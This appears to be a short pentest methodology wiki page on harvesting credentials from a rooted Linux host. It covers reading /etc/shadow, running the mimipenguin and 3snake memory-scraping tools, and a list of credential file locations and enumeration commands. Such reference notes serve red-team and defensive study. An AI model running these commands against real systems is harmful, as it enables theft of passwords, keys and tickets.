## ETC/SHADOW Requires root level privileges STEP 1: Cat the shadow file with root privileges located in etc: ```bash cat /etc/shadow ``` Example: ```bash NIX sha512crypt hash root:$6$52450745$kSka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xslw5pJiypEdFX/ ``` ## MIMIPENGUIN Tool inspired by mimikatz to extract in Linux known offsets where possible clear text passwords are stored. Requires root level privileges. https://github.com/huntergregal/mimipenguin STEP 1: Git clone mimipenguin: ```bash git clone https://github.com/huntergregal/mimipenguin.git ``` STEP 2: Execute mimipenguin with sudo or root privileges: ```bash sudo mimipenguin ``` ## 3SNAKE Targeting rooted servers, reads memory from sshd and sudo system calls that handle password based authentication. https://github.com/blendin/3snake STEP 1: Git clone 3snake: ```bash git clone https://github.com/blendin/3snake.git ``` STEP 2: Build 3snake binary. STEP 3: Excute 3snake on a target system with root privileges: ```bash sudo 3snake ``` ## PROCDUMP-FOR-LINUX No known techniques have been released for dumping credentials out of memory using the new linux 'procdump' but figured I include it for others to explore. https://github.com/Microsoft/ProcDump-for-Linux ## OTHER PLACES List of other places or commands in Linux machine to enumerate passwords, keys, tickets, or hashes. ### LOCATIONS ```bash /home/*/.bash_history /home/*/.mysql_history /etc/cups/printers.conf /home/*/.ssh/ /tmp/krbScc_• /home/*/.gnupg/secring.gpgs ``` ### COMMANDS ```bash # getent passwd # pdbedit -L -w # ypcat passwd # klist ``` [[Home]] #methodology